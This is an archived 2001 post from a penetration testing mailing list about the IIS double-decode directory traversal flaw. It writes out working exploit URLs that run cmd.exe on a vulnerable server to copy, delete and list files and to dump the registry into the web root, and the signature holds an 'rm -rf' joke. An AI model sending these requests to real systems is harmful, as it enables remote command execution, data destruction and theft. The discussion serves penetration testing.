Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

RE: IIS : access to cmd.exe and multiple commands on one line

From: Sam Steinmeyer <SamSteinmeyer () winn-dixie com>
Date: Wed, 24 Oct 2001 13:54:58 -0400
I've tried vairous combinations myself.  You can call any vaild cmd.exe DOS
command. Example:
Copy:
        
scripts/..%25%35c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\xcopy.e
xe+c:\Mycopy.exe

Delete:
        
scripts/..%25%35c../winnt/system32/cmd.exe?/c+del+c:\winnt\system32\xcopy.ex
e+c:\Mycopy.exe

Dir with /w
        scripts/..%25%35c../winnt/system32/cmd.exe?/c+dir+/w

Here's a cool one: Dump the registry to a text file and view from web... :)
        
scripts/..%25%35c../winnt/system32/cmd.exe?/c+regedit+/e+c:\inetpub\wwwroot\
registry.txt

When executing the cmd.exe through IIS, you only have a one shot. However,
when you are in the DOS Shell, you have the advantage of the Shell to parse
your command lines.  
Ie. 

dir /w | cmd

You will not be able to memic this through IIS, due to the absence of the
DOS Shell.

my 2 cents.
         ______
        /_____/\          Harry Steinmeyer
       /____ \\ \         Senior Programmer
      /_____\ \\ /        Winn-Dixie, Inc.
     /_____/ \/ / /       
    /_____/ /   \//\      rm -rf /bin/laden
    \_____\//\   / /
     \_____/ / /\ /       
      \_____/ \\ \        
       \_____\ \\        
        \_____\/          
"Science without religion is lame, religion without science is blind."
Einstein, Albert (1879-1955)

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
Previous By Date Next
Previous By Thread Next

Current thread: